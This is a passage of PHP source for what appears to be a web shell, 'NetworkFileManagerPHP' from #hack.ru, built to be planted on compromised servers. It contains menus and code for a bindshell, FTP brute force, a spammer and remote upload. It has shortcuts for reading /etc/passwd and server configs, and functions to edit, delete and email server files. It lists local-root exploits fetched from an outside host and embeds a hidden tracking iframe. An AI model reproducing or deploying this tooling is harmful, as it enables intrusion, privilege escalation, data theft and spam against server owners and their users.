+document.hackru.chars_de.focus(); + +} + +</script> + +ins; + + + +/* send form */ + +$form = " + +<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr> + + <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td> + + </tr> <form method='POST' action='$PHP_SELF?action=feedback&status=ok'> + + <tr> + + <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td> + + </tr> + + <tr> + + <td width='250' class=pagetitle><b>Your name:</b></td> + + <td width='250' class=pagetitle> + + <input type='text' name='name' size='40' class='inputbox'></td> + + </tr> + + <tr> + + <td width='250' class=pagetitle><b>Email:</b></td> + + <td width='250'><input type='text' name='email' size='40' class='inputbox'></td> + + </tr> + + + + <tr> + + <td colspan=2 align=center 
class=pagetitle><b> + + Your questions and wishes: + + </b></font></b></td> + + </tr> + + <tr> + + <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr> + + <tr> + + <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td> + + <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td> + + </tr> + +</form></table><br> + +"; + + + + + + + +/* HTML Form */ + +$HTML=<<<html + +<html> + +<head> + +<title>$title $ver</title> + +$meta + +$style + +$ins + +</head> + + + +<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> + +<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr> + +<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr> + +<tr> + +<td class=pagetitle align=center width='85%'><b>Script help:</b></td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td> + +</tr> + + + +<tr> + +<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP 
bruteforce</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td> + +</tr> + +<tr> + +<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td> + +<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td> + +<td $style_open align=center width='15%' colspan=3><a class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td> + +<tr> + +<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td> + +</tr> + +<tr> + +<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td> + +</tr> + +<tr> + +<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu 
href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td> + +<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td> + + + +</tr> + +<!-- add by revers --> + +<tr> + +<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td> +<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td> + +</tr> + +<!-- end add by revers --> + +</table> + +html; + +$key="goatse"; + +$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>"; + +/* randomizing letters array for random filenames of compression folders */ + +$CHARS = "abcdefghijklmnopqrstuvwxyz"; + +for ($i=0; $i<6; $i++) $pass .= $CHARS[rand(0,strlen($CHARS)-1)]; + + + +/* set full path to host and dir where public exploits and soft are situated */ + +$public_site = "http://hackru.info/adm/exploits/public_exploits/"; + +/* $public_site = "http://localhost/adm/public_exploits/"; */ + +/* Public exploits and soft */ + +$public[1] = "s"; // bindshell + +$title_ex[1] = " + +&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br> + +<dd><b>Run:</b> ./s<br> + +&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u> + +"; + +$public[2] = "m"; // mremap + +$title_ex[2] = " + +&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br> + +<dd><b>Run:</b> ./m<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! 
+ +"; + +$public[3] = "p"; // ptrace + +$title_ex[3] = " + +&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br> + +<dd><b>Run:</b> ./p<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc + +$title_ex[4] = " + +&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br> + +<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br> + +<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br> + +&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall! + +"; + +/* Private exploits */ + +$private[1] = "brk"; // localroot root linux 2.4.* + +$title_exp[1] = " + +&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br> + +<dd><b>Run:</b> ./brk<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK + +$title_exp[2] = " + +&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br> + +<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br> + +glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[3] = "glftpd"; + +$title_exp[3] = " + +&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br> + +part 2<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! 
+ +"; + +$private[4] = "sortrace"; + +$title_exp[4] = " + +&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br> + +<dd><b>Run:</b> ./sortrace<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[5] = "root"; + +$title_exp[5] = " + +&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br> + +<dd><b>Run:</b> ./root<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[6] = "sxp"; + +$title_exp[6] = " + +&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br> + +<dd><b>Run:</b> ./sxp<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[7] = "ptrace_kmod"; + +$title_exp[7] = " + +&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br> + +<dd><b>Run:</b> ./ptrace_kmod<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! + +"; + +$private[8] = "mr1_a"; + +$title_exp[8] = " + +&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br> + +<dd><b>Run:</b> ./mr1_a<br> + +&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! 
+ +"; + +/* set full path to host and dir where private exploits and soft are situated */ + +$private_site = "http://hackru.info/adm/exploits/private_exploits/"; + +endif; + + + +$createdir= "files"; + + + +/* spamer config */ + + + +$sendemail = "packetstorm@km.ru"; + +$confirmationemail = "packetstorm@km.ru"; + +$mailsubject = "Hello!This is a test message!"; + + + + + + + +/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING */ + +global $action,$tm,$cm; + + + +function getdir() { + + global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF; + + $st = getcwd(); + + $st = str_replace("\\","/",$st); + + $j = 0; + + $gdir = array(); + + $gsub = array(); + + print("<br>"); + + for ($i=0;$i<=(strlen($st)-1);$i++) { + + if ($st[$i] != "/") { + + $gdir[$j] = $gdir[$j].$st[$i]; + + $gsub[$j] = $gsub[$j].$st[$i]; + + } else { + + $gdir[$j] = $gdir[$j]."/"; + + $gsub[$j] = $gsub[$j]."/"; + + $gdir[$j+1] = $gdir[$j]; + + $j++; + + } + + } + + + print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>"); + + for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>"); + + $free = tinhbyte(diskfreespace("./")); + + print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>"); + + print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>"); + + print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>"); + + print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>"); + + print("<tr><td><b>&nbsp; ".exec("id")." 
&nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>"); + + print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>"); + + +} + +function tinhbyte($filesize) { + + if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; } + + elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; } + + elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; } + + else { $filesize = $filesize . ""; } + + return $filesize; + +} + + + +function permissions($mode) { + + $perms = ($mode & 00400) ? "r" : "-"; + + $perms .= ($mode & 00200) ? "w" : "-"; + + $perms .= ($mode & 00100) ? "x" : "-"; + + $perms .= ($mode & 00040) ? "r" : "-"; + + $perms .= ($mode & 00020) ? "w" : "-"; + + $perms .= ($mode & 00010) ? "x" : "-"; + + $perms .= ($mode & 00004) ? "r" : "-"; + + $perms .= ($mode & 00002) ? "w" : "-"; + + $perms .= ($mode & 00001) ? "x" : "-"; + + return $perms; + +} + + + +function readdirdata($dir) { + + global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF; + + $files = array(); + + $dirs= array(); + + $open = @opendir($dir); + + + + if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>"; + + else { + + $open = opendir($dir); + + while ($file = readdir($open)) { + + $rec = $file; + + $file = $dir."/".$file; + + if (is_file($file)) $files[] = $rec; + + } + + sort($files); + + $open = opendir($dir); + + $i=0; + + while ($dire = readdir($open)) { + + if ( $dire != "." 
) { + + $rec = $dire; + + $dire = $dir."/".$dire; + + if (is_dir($dire)) { + + $dirs[] = $rec; + + $i++; + + } + + } + + } + + sort($dirs); + + print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>"); + + for ($i=0;$i<sizeof($dirs);$i++) { + + if ($dirs[$i] != "..") { + + $type = 'Dir'; + + $fullpath = $dir."/".$dirs[$i]; + + $time = date("d/m/y H:i",filemtime($fullpath)); + + $perm = permissions(fileperms($fullpath)); + + $size = tinhbyte(filesize($fullpath)); + + $name = $dirs[$i]; + + $fullpath = $tm."/".$dirs[$i]; + + if ($perm[7] == "w" && $name != "..") $action = " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr> + + <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td> + + <td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td> + + </tr> + + <tr> + + <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td> + + <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td> + + </tr></table>"; + + else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href 
='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>"; + + print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>"); + + } + + } + + for ($i=0;$i<sizeof($files);$i++) { + + $type = 'File'; + + $fullpath = $dir."/".$files[$i]; + + $time = date("d/m/y H:i",filemtime($fullpath)); + + $perm = permissions(fileperms($fullpath)); + + $size = tinhbyte(filesize($fullpath)); + + if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td> + + <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr> + + <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td> + + <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td> + + </tr></table>"; + + if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td> + + <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td> + + </tr></table>"; + + print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 
bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>"); + + } + + } + +} + + + +function html() { + +global $ver,$meta,$style; + +echo " + +<html> + +<head> + +<title>NetworkFileManagerPHP</title> + +</head> + +<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> + +"; + +} + + + +# file view + +function viewfile($dir,$file) { + + + + $buf = explode(".", $file); + + $ext = $buf[sizeof($buf)-1]; + + $ext = strtolower($ext); + + $dir = str_replace("\\","/",$dir); + + $fullpath = $dir."/".$file; + + + + switch ($ext) { + + case "jpg": + + + + header("Content-type: image/jpeg"); + + readfile($fullpath); + + break; + + case "jpeg": + + + + header("Content-type: image/jpeg"); + + readfile($fullpath); + + break; + + case "gif": + + + + header("Content-type: image/gif"); + + readfile($fullpath); + + break; + + + + case "png": + + + + header("Content-type: image/png"); + + readfile($fullpath); + + break; + + default: + + + + case "avi": + + header("Content-type: video/avi"); + + readfile($fullpath); + + + + break; + + default: + + + + case "mpeg": + + header("Content-type: video/mpeg"); + + readfile($fullpath); + + break; + + default: + + + + case "mpg": + + header("Content-type: video/mpg"); + + readfile($fullpath); + + break; + + default: + + + + html(); + + chdir($dir); + + getdir(); + + + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white face ='Tahoma' size = 2>$fullpath</font></td></tr></table>"; + + $fp = fopen($fullpath , "r"); + + while 
(!feof($fp)) { + + $char = fgetc($fp); + + $st .= $char; + + } + + + + $st = str_replace("&", "&amp;", $st); + + $st = str_replace("<", "&lt;", $st); + + $st = str_replace(">", "&gt;", $st); + + + + $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>"; + + echo $tem; + + fclose($fp); + + break; + + } + +} + + + +# send file to mail + +function download_mail($dir,$file) { + + global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED; + + $buf = explode(".", $file); + + $dir = str_replace("\\","/",$dir); + + $fullpath = $dir."/".$file; + + $size = tinhbyte(filesize($fullpath)); + + $fp = fopen($fullpath, "rb"); + + while(!feof($fp)) + + + + $attachment .= fread($fp, 4096); + + $attachment = base64_encode($attachment); + + $subject = "NetworkFileManagerPHP ($file)"; + + + + $boundary = uniqid("NextPart_"); + + $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\""; + + + + $info = "---==== Message from ($demail)====---\n\n"; + + $info .= "IP:\t$REMOTE_ADDR\n"; + + $info .= "HOST:\t$HTTP_HOST\n"; + + $info .= "URL:\t$HTTP_REFERER\n"; + + $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; + + $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--"; + + + + $send_to = "$demail"; + + + + $send = mail($send_to, $subject, $info, $headers); + + + + if($send == 2) + + echo "<br> + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td align=center> + + <font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>"; + + + +fclose($fp); + + } + + + + + + + 
+function copyfile($dir,$file) { + + global $action,$tm; + + $fullpath = $dir."/".$file; + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>"; + + if (!copy($file, $file.'.bak')){ + + echo (" unable to copy file $file"); + + } + +} + + + + + +# file edit + +function editfile($dir,$file) { + + global $action,$datar; + + $fullpath = $dir."/".$file; + + chdir($dir); + + getdir(); + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>"; + + $fp = fopen($fullpath , "r"); + + while (!feof($fp)) { + + $char = fgetc($fp); + + $st .= $char; + + } + + $st = str_replace("&", "&amp;", $st); + + $st = str_replace("<", "&lt;", $st); + + $st = str_replace(">", "&gt;", $st); + + $st = str_replace('"', "&quot;", $st); + + echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>"; + + $datar = $S1; + + + +} + + + +# file write + +function savefile($dir,$file) { + + global $action,$S1,$tm; + + $fullpath = $dir."/".$file; + + $fp = fopen($fullpath, "w"); + + $S1 = stripslashes($S1); + + fwrite($fp,$S1); + + fclose($fp); + + chdir($dir); + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center 
bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>"; + + getdir(); + + readdirdata($tm); + +} + + + +# directory delete + +function deletef($dir) + +{ + + global $action,$tm,$fi; + + $tm = str_replace("\\\\","/",$tm); + + $link = $tm."/".$fi; + + unlink($link); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# file upload + +function uploadtem() { + + global $file,$tm,$thum,$PHP_SELF,$dir,$style_button; + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>"; + +} + + + +function upload() { + + global $HTTP_POST_FILES,$tm; + + echo $set; + + copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]); + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>"; + + @unlink($userfile); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# get exploits + +function upload_exploits() { + + global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp; + + + + echo "<br> + + <TABLE 
CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_ex[1]</td> + + <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'> + + <input type='hidden' name='file2' value='$public[1]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_ex[2]</td> + + <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'> + + <input type='hidden' name='file2' value='$public[2]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - 
<u>p</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_ex[3]</td> + + <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'> + + <input type='hidden' name='file2' value='$public[3]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_ex[4]</td> + + <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'> + + <input type='hidden' name='file2' value='$public[4]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + + + echo "<br> + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Private exploits:</b></td></tr> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[1]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'> + + <input type='hidden' name='file2' value='$private[1]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 
